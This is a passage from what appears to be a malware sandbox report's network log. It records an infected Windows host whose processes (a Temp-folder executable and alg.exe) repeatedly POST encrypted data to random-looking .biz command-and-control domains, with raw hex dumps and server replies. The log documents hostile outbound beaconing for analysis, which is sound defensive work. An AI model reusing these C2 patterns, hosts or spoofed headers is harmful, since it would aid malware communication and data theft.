                                                                                                                                                                                                                                                                                                                                                    Nov 26, 2024 08:13:13.813507080 CET834OUTData Raw: 02 b0 55 83 17 b7 b0 69 36 03 00 00 47 22 53 8e 36 64 82 a1 cc 00 fb ed b4 33 00 d0 f3 bc bb 50 c5 f6 d2 24 53 f7 7c fe e2 d1 ad 2e 0e 60 58 d1 09 0b 85 e8 d2 68 57 7b 6c 00 26 67 e4 f2 18 38 c8 a7 95 65 b2 6a 92 c2 1d f8 97 ba 1b 29 7b 86 29 5f
                                                                                                                                                                                                                                                                                                                                                    Data Ascii: Ui6G"S6d3P$S|.`XhW{l&g8ej){)_!wXBdJJ"']{#3Cov9{ec3Ob1.?arM%(u<PVoET%X|/tT<yy_S ].d3y`P,8Q}?J\ZM9gs1


                                                                                                                                                                                                                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                                                                                                    23192.168.2.104987182.112.184.197806072C:\Windows\System32\alg.exe
                                                                                                                                                                                                                                                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                                                                    Nov 26, 2024 08:13:14.600614071 CET357OUTPOST /nbnssijhjwmugla HTTP/1.1
                                                                                                                                                                                                                                                                                                                                                    Cache-Control: no-cache
                                                                                                                                                                                                                                                                                                                                                    Connection: Keep-Alive
                                                                                                                                                                                                                                                                                                                                                    Pragma: no-cache
                                                                                                                                                                                                                                                                                                                                                    Host: lpuegx.biz
                                                                                                                                                                                                                                                                                                                                                    User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400
                                                                                                                                                                                                                                                                                                                                                    Content-Length: 778
                                                                                                                                                                                                                                                                                                                                                    Nov 26, 2024 08:13:14.600627899 CET778OUTData Raw: 7e 58 aa c6 2f eb 3c 69 fe 02 00 00 25 ee 05 aa 81 6f 85 91 b4 74 cd 7b b2 18 5b c1 ba c3 20 82 d0 49 4d 66 63 5b 74 c9 eb b9 c7 69 ea 83 a3 04 d1 0d 92 bd 1f 78 4f 82 91 c3 fb 55 1e 47 6e d4 b6 82 7e ea 22 8e 02 a1 bd dc 2b a3 bf af 28 55 63 40
                                                                                                                                                                                                                                                                                                                                                    Data Ascii: ~X/<i%ot{[ IMfc[tixOUGn~"+(Uc@W@j9Q#Ye0 /,Vlplo7"e/Rv\F%%mv<JDx90I{7z ^@l=,2"N)Siw-wGU1


                                                                                                                                                                                                                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                                                                                                    24192.168.2.104990982.112.184.197807892C:\Users\user\AppData\Local\Temp\Native_neworigin.exe
                                                                                                                                                                                                                                                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                                                                    Nov 26, 2024 08:13:32.721420050 CET353OUTPOST /hpkejgwwxdp HTTP/1.1
                                                                                                                                                                                                                                                                                                                                                    Cache-Control: no-cache
                                                                                                                                                                                                                                                                                                                                                    Connection: Keep-Alive
                                                                                                                                                                                                                                                                                                                                                    Pragma: no-cache
                                                                                                                                                                                                                                                                                                                                                    Host: lpuegx.biz
                                                                                                                                                                                                                                                                                                                                                    User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400
                                                                                                                                                                                                                                                                                                                                                    Content-Length: 834
                                                                                                                                                                                                                                                                                                                                                    Nov 26, 2024 08:13:32.723139048 CET834OUTData Raw: 4a 12 0f 0c 68 cd dc e4 36 03 00 00 06 42 52 ff 44 b3 d3 11 58 90 c0 2c 0d b5 62 48 54 43 96 e2 a6 91 13 5b 47 62 48 38 62 86 be 57 f9 c8 f4 c4 71 a3 96 09 0d 28 72 aa f3 db cd ef 78 3c 00 fc ee 20 c8 13 e3 8b 58 50 d1 5f 89 1b 10 da 31 63 f6 73
                                                                                                                                                                                                                                                                                                                                                    Data Ascii: Jh6BRDX,bHTC[GbH8bWq(rx< XP_1csMd~GS L-4AH'|ire(|3%c6@<xV^X:7jRuwy)ja)XlH;4"`c{t|c


                                                                                                                                                                                                                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                                                                                                    25192.168.2.104992182.112.184.197806072C:\Windows\System32\alg.exe
                                                                                                                                                                                                                                                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                                                                    Nov 26, 2024 08:13:37.925230026 CET361OUTPOST /pnckkgdjorsjoiow HTTP/1.1
                                                                                                                                                                                                                                                                                                                                                    Cache-Control: no-cache
                                                                                                                                                                                                                                                                                                                                                    Connection: Keep-Alive
                                                                                                                                                                                                                                                                                                                                                    Pragma: no-cache
                                                                                                                                                                                                                                                                                                                                                    Host: vjaxhpbji.biz
                                                                                                                                                                                                                                                                                                                                                    User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400
                                                                                                                                                                                                                                                                                                                                                    Content-Length: 778
                                                                                                                                                                                                                                                                                                                                                    Nov 26, 2024 08:13:37.925251961 CET778OUTData Raw: a8 af 04 fa a7 a3 97 31 fe 02 00 00 df e5 9c fa 5d d5 aa 44 e4 f4 ca 55 57 5b af 33 45 b6 fb f6 4a de 06 78 23 20 32 01 eb 31 1a 52 fb 8b 4c 62 6a 0f 04 3b 88 01 b4 3e 72 b4 7f 97 cf 6c 99 56 ec 8d 26 78 72 84 38 d7 eb ad cd 30 71 54 7d 2a 15 7a
                                                                                                                                                                                                                                                                                                                                                    Data Ascii: 1]DUW[3EJx# 21RLbj;>rlV&xr80qT}*zXDaPn:1lr)|1Mk*O7CkKEZSBZHU<*2=:+[:_ru@vD)f2NRa7l.=+._Ez


                                                                                                                                                                                                                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                                                                                                    26192.168.2.104996082.112.184.197807892C:\Users\user\AppData\Local\Temp\Native_neworigin.exe
                                                                                                                                                                                                                                                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                                                                    Nov 26, 2024 08:13:55.127099991 CET357OUTPOST /dhyyqtllpdwr HTTP/1.1
                                                                                                                                                                                                                                                                                                                                                    Cache-Control: no-cache
                                                                                                                                                                                                                                                                                                                                                    Connection: Keep-Alive
                                                                                                                                                                                                                                                                                                                                                    Pragma: no-cache
                                                                                                                                                                                                                                                                                                                                                    Host: vjaxhpbji.biz
                                                                                                                                                                                                                                                                                                                                                    User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400
                                                                                                                                                                                                                                                                                                                                                    Content-Length: 834
                                                                                                                                                                                                                                                                                                                                                    Nov 26, 2024 08:13:55.127124071 CET834OUTData Raw: 22 13 ae 87 34 f1 1f 56 36 03 00 00 91 f0 55 fa 0b 55 c7 a0 e0 e2 fe b8 b9 ac 3f 2e 83 b6 77 cd 8b 02 c5 ae 1a c0 9f e9 45 33 b4 d8 5b 1e 45 9a df 1e d9 d3 a4 89 c1 45 23 ac 5f 57 77 86 1a c6 2f 71 3f ec f9 a9 a1 a3 01 c4 54 99 67 c5 82 4e 54 73
                                                                                                                                                                                                                                                                                                                                                    Data Ascii: "4V6UU?.wE3[EE#_Ww/q?TgNTs0M3DOwk:]?{!:M2|cf+1c3{a\Nf&dJhz3FfS~Sf3:9x3UGu*QB#8^/|p


                                                                                                                                                                                                                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                                                                                                    27192.168.2.104997282.112.184.197806072C:\Windows\System32\alg.exe
                                                                                                                                                                                                                                                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                                                                    Nov 26, 2024 08:14:00.562738895 CET361OUTPOST /btnkoeanfymxsstk HTTP/1.1
                                                                                                                                                                                                                                                                                                                                                    Cache-Control: no-cache
                                                                                                                                                                                                                                                                                                                                                    Connection: Keep-Alive
                                                                                                                                                                                                                                                                                                                                                    Pragma: no-cache
                                                                                                                                                                                                                                                                                                                                                    Host: vjaxhpbji.biz
                                                                                                                                                                                                                                                                                                                                                    User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400
                                                                                                                                                                                                                                                                                                                                                    Content-Length: 778
                                                                                                                                                                                                                                                                                                                                                    Nov 26, 2024 08:14:00.562786102 CET778OUTData Raw: df d1 f6 0a f8 9c 93 76 fe 02 00 00 4f 15 46 3f 9d 7a 35 43 11 3c 60 b6 25 07 db 57 f6 c4 67 61 22 49 a2 d4 3e 8e 3a 2d 69 14 70 d5 ed 4a 27 84 7f 05 03 2c 49 e3 5d ed 11 a9 44 e2 96 74 e9 22 ef 49 5d dd 2e f1 26 ee 34 2d 65 5d e5 b7 fa 9b b2 dc
                                                                                                                                                                                                                                                                                                                                                    Data Ascii: vOF?z5C<`%Wga"I>:-ipJ',I]Dt"I].&4-e]lgH6WZ#,lv"N fxS7mliCw^LuDMmn8|4}M<tUBKrtA~5lC~+\bG0Oshpu={_


                                                                                                                                                                                                                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                                                                                                    28192.168.2.105000182.112.184.197807892C:\Users\user\AppData\Local\Temp\Native_neworigin.exe
                                                                                                                                                                                                                                                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                                                                    Nov 26, 2024 08:14:17.243869066 CET355OUTPOST /pgakntaoep HTTP/1.1
                                                                                                                                                                                                                                                                                                                                                    Cache-Control: no-cache
                                                                                                                                                                                                                                                                                                                                                    Connection: Keep-Alive
                                                                                                                                                                                                                                                                                                                                                    Pragma: no-cache
                                                                                                                                                                                                                                                                                                                                                    Host: vjaxhpbji.biz
                                                                                                                                                                                                                                                                                                                                                    User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400
                                                                                                                                                                                                                                                                                                                                                    Content-Length: 834
                                                                                                                                                                                                                                                                                                                                                    Nov 26, 2024 08:14:17.243946075 CET834OUTData Raw: 79 4a 47 30 49 30 d6 01 36 03 00 00 8f 4b f3 55 4e c2 45 6c 00 f3 4b a5 7e 9f f1 e4 17 db ad b2 54 8d 9d b1 c7 3f 6f 14 8f a0 ea c4 d1 47 bb 8a f4 f3 d8 86 b2 f1 be ce a5 67 2e 11 5c 7d b9 44 0e 71 a6 96 94 90 f8 1b 6d fb 2e 95 2e a7 60 66 ce c8
                                                                                                                                                                                                                                                                                                                                                    Data Ascii: yJG0I06KUNElK~T?oGg.\}Dqm..`f8w8_*RmxRV:wod;6V(F~9N>98<Zx#T?WS8`_(|-:^2O:0EXrZHW


                                                                                                                                                                                                                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                                                                                                    29192.168.2.105000947.129.31.212806072C:\Windows\System32\alg.exe
                                                                                                                                                                                                                                                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                                                                    Nov 26, 2024 08:14:23.392894030 CET351OUTPOST /ihrtfcsj HTTP/1.1
                                                                                                                                                                                                                                                                                                                                                    Cache-Control: no-cache
                                                                                                                                                                                                                                                                                                                                                    Connection: Keep-Alive
                                                                                                                                                                                                                                                                                                                                                    Pragma: no-cache
                                                                                                                                                                                                                                                                                                                                                    Host: xlfhhhm.biz
                                                                                                                                                                                                                                                                                                                                                    User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400
                                                                                                                                                                                                                                                                                                                                                    Content-Length: 778
                                                                                                                                                                                                                                                                                                                                                    Nov 26, 2024 08:14:23.392915010 CET778OUTData Raw: 6f 05 cd cb 03 37 b2 ea fe 02 00 00 58 5b a0 f2 af 3c 16 51 a0 da 22 42 5a 84 4c dc 28 8b 77 ad f5 42 0a 64 f1 f4 9a 5f 24 3b 32 08 5b e7 41 ac 51 cd fc 02 e4 b9 a4 69 d4 3a 30 5c db b5 b6 f5 28 ae 3f d7 8b 0d c9 37 cc 6c 97 4c 7a fe 73 98 7f 7b
                                                                                                                                                                                                                                                                                                                                                    Data Ascii: o7X[<Q"BZL(wBd_$;2[AQi:0\(?7lLzs{x5ars8Vy!|n=tsJK_nAXy3k97vw47!:PVt0;^l!$/7jLJKU~M0`mTb|V3R
                                                                                                                                                                                                                                                                                                                                                    Nov 26, 2024 08:14:25.542898893 CET409INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                                                                                    Server: nginx
                                                                                                                                                                                                                                                                                                                                                    Date: Tue, 26 Nov 2024 07:14:25 GMT
                                                                                                                                                                                                                                                                                                                                                    Content-Type: text/html
                                                                                                                                                                                                                                                                                                                                                    Transfer-Encoding: chunked
                                                                                                                                                                                                                                                                                                                                                    Connection: close
                                                                                                                                                                                                                                                                                                                                                    Set-Cookie: btst=901bb05c97be7640452c1c1e31eb0507|8.46.123.75|1732605265|1732605265|0|1|0; path=/; domain=.xlfhhhm.biz; Expires=Thu, 15 Apr 2027 00:00:00 GMT; HttpOnly; SameSite=Lax;
                                                                                                                                                                                                                                                                                                                                                    Set-Cookie: snkz=8.46.123.75; path=/; Expires=Thu, 15 Apr 2027 00:00:00 GMT
                                                                                                                                                                                                                                                                                                                                                    Data Raw: 30 0d 0a 0d 0a
                                                                                                                                                                                                                                                                                                                                                    Data Ascii: 0


                                                                                                                                                                                                                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                                                                                                    30192.168.2.105001013.251.16.150806072C:\Windows\System32\alg.exe
                                                                                                                                                                                                                                                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                                                                    Nov 26, 2024 08:14:26.406873941 CET346OUTPOST /ywao HTTP/1.1
                                                                                                                                                                                                                                                                                                                                                    Cache-Control: no-cache
                                                                                                                                                                                                                                                                                                                                                    Connection: Keep-Alive
                                                                                                                                                                                                                                                                                                                                                    Pragma: no-cache
                                                                                                                                                                                                                                                                                                                                                    Host: ifsaia.biz
                                                                                                                                                                                                                                                                                                                                                    User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400
                                                                                                                                                                                                                                                                                                                                                    Content-Length: 778
                                                                                                                                                                                                                                                                                                                                                    Nov 26, 2024 08:14:26.406913042 CET778OUTData Raw: 31 1a a7 94 bd 64 3b bf fe 02 00 00 4a 06 3a b5 1c d2 87 d0 6e 4d fc 17 8a 9f 4d 16 83 66 a4 2b 20 e3 69 7d 73 23 39 0f df 14 d2 50 6f d3 3b 7f af 0e 0e 08 cd 31 c1 4b ed 46 87 0a df 46 00 49 a3 3c 6d dc 34 9c 70 0e 0b 25 32 54 bd f4 54 4f 3b 31
                                                                                                                                                                                                                                                                                                                                                    Data Ascii: 1d;J:nMMf+ i}s#9Po;1KFFI<m4p%2TTO;1I-Zh/Ro_S~Ux]f{KmJ#*#?z_iK^"`cH&9.jmX`2/<vOF93i>6D7i8.t|@l%~UC
                                                                                                                                                                                                                                                                                                                                                    Nov 26, 2024 08:14:28.506834984 CET408INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                                                                                    Server: nginx
                                                                                                                                                                                                                                                                                                                                                    Date: Tue, 26 Nov 2024 07:14:28 GMT
                                                                                                                                                                                                                                                                                                                                                    Content-Type: text/html
                                                                                                                                                                                                                                                                                                                                                    Transfer-Encoding: chunked
                                                                                                                                                                                                                                                                                                                                                    Connection: close
                                                                                                                                                                                                                                                                                                                                                    Set-Cookie: btst=b692de5da0901ebb7880ed3579e6ecbf|8.46.123.75|1732605268|1732605268|0|1|0; path=/; domain=.ifsaia.biz; Expires=Thu, 15 Apr 2027 00:00:00 GMT; HttpOnly; SameSite=Lax;
                                                                                                                                                                                                                                                                                                                                                    Set-Cookie: snkz=8.46.123.75; path=/; Expires=Thu, 15 Apr 2027 00:00:00 GMT
                                                                                                                                                                                                                                                                                                                                                    Data Raw: 30 0d 0a 0d 0a
                                                                                                                                                                                                                                                                                                                                                    Data Ascii: 0


                                                                                                                                                                                                                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                                                                                                    31192.168.2.105001144.221.84.105806072C:\Windows\System32\alg.exe
                                                                                                                                                                                                                                                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                                                                    Nov 26, 2024 08:14:29.380004883 CET349OUTPOST /hdfj HTTP/1.1
                                                                                                                                                                                                                                                                                                                                                    Cache-Control: no-cache
                                                                                                                                                                                                                                                                                                                                                    Connection: Keep-Alive
                                                                                                                                                                                                                                                                                                                                                    Pragma: no-cache
                                                                                                                                                                                                                                                                                                                                                    Host: saytjshyf.biz
                                                                                                                                                                                                                                                                                                                                                    User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400
                                                                                                                                                                                                                                                                                                                                                    Content-Length: 778
                                                                                                                                                                                                                                                                                                                                                    Nov 26, 2024 08:14:29.380026102 CET778OUTData Raw: 5c d4 89 7e 10 fc 7f 92 fe 02 00 00 e0 3d a8 32 82 98 96 6d 68 84 4f c6 8b 48 fe 04 94 a6 e9 4b 0b 8f 9a 84 54 34 02 fe 29 b7 4f fd 09 44 c7 58 ef 99 b5 90 1d 08 50 5e 20 d8 f5 74 1e be 72 9d b6 cc c5 08 59 4c b7 0f f2 fc 56 61 08 55 c3 8b d6 eb
                                                                                                                                                                                                                                                                                                                                                    Data Ascii: \~=2mhOHKT4)ODXP^ trYLVaU/gGT`,vs%lM_j"w*+7xEYbb>;B}2y`|> >"Ak!r4/%UpR0LTRUh:D#WiPL
                                                                                                                                                                                                                                                                                                                                                    Nov 26, 2024 08:14:30.529479980 CET411INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                                                                                    Server: nginx
                                                                                                                                                                                                                                                                                                                                                    Date: Tue, 26 Nov 2024 07:14:30 GMT
                                                                                                                                                                                                                                                                                                                                                    Content-Type: text/html
                                                                                                                                                                                                                                                                                                                                                    Transfer-Encoding: chunked
                                                                                                                                                                                                                                                                                                                                                    Connection: close
                                                                                                                                                                                                                                                                                                                                                    Set-Cookie: btst=9441b480d1c2baa0fc400af502beb184|8.46.123.75|1732605270|1732605270|0|1|0; path=/; domain=.saytjshyf.biz; Expires=Thu, 15 Apr 2027 00:00:00 GMT; HttpOnly; SameSite=Lax;
                                                                                                                                                                                                                                                                                                                                                    Set-Cookie: snkz=8.46.123.75; path=/; Expires=Thu, 15 Apr 2027 00:00:00 GMT
                                                                                                                                                                                                                                                                                                                                                    Data Raw: 30 0d 0a 0d 0a
                                                                                                                                                                                                                                                                                                                                                    Data Ascii: 0


                                                                                                                                                                                                                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                                                                                                    32192.168.2.105001218.141.10.107806072C:\Windows\System32\alg.exe
                                                                                                                                                                                                                                                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                                                                    Nov 26, 2024 08:14:31.514348030 CET359OUTPOST /udjkgjnyfcxmpggx HTTP/1.1
                                                                                                                                                                                                                                                                                                                                                    Cache-Control: no-cache
                                                                                                                                                                                                                                                                                                                                                    Connection: Keep-Alive
                                                                                                                                                                                                                                                                                                                                                    Pragma: no-cache
                                                                                                                                                                                                                                                                                                                                                    Host: vcddkls.biz
                                                                                                                                                                                                                                                                                                                                                    User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400
                                                                                                                                                                                                                                                                                                                                                    Content-Length: 778
                                                                                                                                                                                                                                                                                                                                                    Nov 26, 2024 08:14:31.514395952 CET778OUTData Raw: f3 31 36 a0 e5 b9 c5 bc fe 02 00 00 0d bb 2d 09 74 c9 9b 10 ee 7a 5b 2f 91 1e f8 db 32 24 13 54 fa a8 24 01 02 6f c8 38 d2 a4 90 66 52 b6 a0 64 69 1d 0e 36 3a 7a ea 27 42 43 18 69 93 27 89 77 7f c1 34 17 b3 c0 b2 6a 23 6e dc 53 3a cd d2 ef c2 59
                                                                                                                                                                                                                                                                                                                                                    Data Ascii: 16-tz[/2$T$o8fRdi6:z'BCi'w4j#nS:Y"0609K0N.U?c^HF~f.(V8}A9 %B%L{Ub~To/n{f=eF//jgviC-w 26a$}
                                                                                                                                                                                                                                                                                                                                                    Nov 26, 2024 08:14:33.633343935 CET409INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                                                                                    Server: nginx
                                                                                                                                                                                                                                                                                                                                                    Date: Tue, 26 Nov 2024 07:14:33 GMT
                                                                                                                                                                                                                                                                                                                                                    Content-Type: text/html
                                                                                                                                                                                                                                                                                                                                                    Transfer-Encoding: chunked
                                                                                                                                                                                                                                                                                                                                                    Connection: close
                                                                                                                                                                                                                                                                                                                                                    Set-Cookie: btst=f62f947978c38e3c4c0488de5c282e66|8.46.123.75|1732605273|1732605273|0|1|0; path=/; domain=.vcddkls.biz; Expires=Thu, 15 Apr 2027 00:00:00 GMT; HttpOnly; SameSite=Lax;
                                                                                                                                                                                                                                                                                                                                                    Set-Cookie: snkz=8.46.123.75; path=/; Expires=Thu, 15 Apr 2027 00:00:00 GMT
                                                                                                                                                                                                                                                                                                                                                    Data Raw: 30 0d 0a 0d 0a
                                                                                                                                                                                                                                                                                                                                                    Data Ascii: 0


                                                                                                                                                                                                                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                                                                                                    33192.168.2.1050013172.234.222.138806072C:\Windows\System32\alg.exe
                                                                                                                                                                                                                                                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                                                                    Nov 26, 2024 08:14:35.133096933 CET349OUTPOST /lhiqwpom HTTP/1.1
                                                                                                                                                                                                                                                                                                                                                    Cache-Control: no-cache
                                                                                                                                                                                                                                                                                                                                                    Connection: Keep-Alive
                                                                                                                                                                                                                                                                                                                                                    Pragma: no-cache
                                                                                                                                                                                                                                                                                                                                                    Host: fwiwk.biz
                                                                                                                                                                                                                                                                                                                                                    User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400
                                                                                                                                                                                                                                                                                                                                                    Content-Length: 778
                                                                                                                                                                                                                                                                                                                                                    Nov 26, 2024 08:14:35.133124113 CET778OUTData Raw: 48 ef 86 d2 a8 23 2a 5f fe 02 00 00 79 a7 14 7a f4 8d 0c ea f2 1e dc 73 b9 60 7e 57 22 79 6d 9f a9 62 33 f6 ce 94 ec 87 d4 09 a7 d3 ec c0 3a 60 f1 72 43 3c 2c 92 a9 f5 c3 d1 b3 08 06 f2 d5 75 40 d8 0a 99 cd a2 45 57 9e 01 32 52 5b 3e 1e bd 4e 28
                                                                                                                                                                                                                                                                                                                                                    Data Ascii: H#*_yzs`~W"ymb3:`rC<,u@EW2R[>N(IEUUPPKW4dRm9<y$Eh7HCmXZ'}0^WpoU%@!suGltfT9TV`~`&g&C8}83M


                                                                                                                                                                                                                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                                                                                                    34192.168.2.1050014172.234.222.138806072C:\Windows\System32\alg.exe
                                                                                                                                                                                                                                                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                                                                    Nov 26, 2024 08:14:36.456195116 CET351OUTPOST /opshcknhcx HTTP/1.1
                                                                                                                                                                                                                                                                                                                                                    Cache-Control: no-cache
                                                                                                                                                                                                                                                                                                                                                    Connection: Keep-Alive
                                                                                                                                                                                                                                                                                                                                                    Pragma: no-cache
                                                                                                                                                                                                                                                                                                                                                    Host: fwiwk.biz
                                                                                                                                                                                                                                                                                                                                                    User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400
                                                                                                                                                                                                                                                                                                                                                    Content-Length: 778
                                                                                                                                                                                                                                                                                                                                                    Nov 26, 2024 08:14:36.456231117 CET778OUTData Raw: 39 4a e9 43 83 0d 00 22 fe 02 00 00 d7 ce 50 8b 3a 68 76 d9 5a 3f b0 d1 09 4b 35 f3 87 66 b8 b2 15 31 ff 61 dd eb bb 19 d5 86 f3 a3 c2 37 dc 32 67 1e fa 47 d3 07 1b ae 27 e8 b9 fd 16 66 8b a2 d9 68 f5 22 2c fc 7d 7c c8 0b 04 41 ba f0 3b 4a 4b bd
                                                                                                                                                                                                                                                                                                                                                    Data Ascii: 9JC"P:hvZ?K5f1a72gG'fh",}|A;JK|fq;4|%_L~]WTai*A{lCqNCfF)*fWYZ"QWt&5jJO*KN#&*kY_q^f -$L7D$


                                                                                                                                                                                                                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                                                                                                    35192.168.2.105001534.246.200.160806072C:\Windows\System32\alg.exe
                                                                                                                                                                                                                                                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                                                                    Nov 26, 2024 08:14:38.353823900 CET350OUTPOST /cmdgaowb HTTP/1.1
                                                                                                                                                                                                                                                                                                                                                    Cache-Control: no-cache
                                                                                                                                                                                                                                                                                                                                                    Connection: Keep-Alive
                                                                                                                                                                                                                                                                                                                                                    Pragma: no-cache
                                                                                                                                                                                                                                                                                                                                                    Host: tbjrpv.biz
                                                                                                                                                                                                                                                                                                                                                    User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400
                                                                                                                                                                                                                                                                                                                                                    Content-Length: 778
                                                                                                                                                                                                                                                                                                                                                    Nov 26, 2024 08:14:38.353823900 CET778OUTData Raw: b7 cb f5 fa 4b 66 60 46 fe 02 00 00 16 34 6a ff 69 e1 d2 5f 9e d8 de 11 c8 7c ba 55 4d c2 ff 73 e9 92 86 80 91 26 b8 a7 61 4f e4 f1 bb f2 57 9c 61 2e 0f bf 97 62 6e 2e 38 b2 36 1a 9e bc 10 3b a5 08 cb aa 5f cc 65 25 75 36 4b 5a 58 1b 9e df 1e 25
                                                                                                                                                                                                                                                                                                                                                    Data Ascii: Kf`F4ji_|UMs&aOWa.bn.86;_e%u6KZX%9pCEji _-|Q~O.e.8iU17kh">AART'!^*wwT.<TPQekWCZA:$d7PhXBD&*|
                                                                                                                                                                                                                                                                                                                                                    Nov 26, 2024 08:14:39.765475988 CET408INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                                                                                    Server: nginx
                                                                                                                                                                                                                                                                                                                                                    Date: Tue, 26 Nov 2024 07:14:39 GMT
                                                                                                                                                                                                                                                                                                                                                    Content-Type: text/html
                                                                                                                                                                                                                                                                                                                                                    Transfer-Encoding: chunked
                                                                                                                                                                                                                                                                                                                                                    Connection: close
                                                                                                                                                                                                                                                                                                                                                    Set-Cookie: btst=820f1c0a66bf3a02224be4467871c96f|8.46.123.75|1732605279|1732605279|0|1|0; path=/; domain=.tbjrpv.biz; Expires=Thu, 15 Apr 2027 00:00:00 GMT; HttpOnly; SameSite=Lax;
                                                                                                                                                                                                                                                                                                                                                    Set-Cookie: snkz=8.46.123.75; path=/; Expires=Thu, 15 Apr 2027 00:00:00 GMT
                                                                                                                                                                                                                                                                                                                                                    Data Raw: 30 0d 0a 0d 0a
                                                                                                                                                                                                                                                                                                                                                    Data Ascii: 0


                                                                                                                                                                                                                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
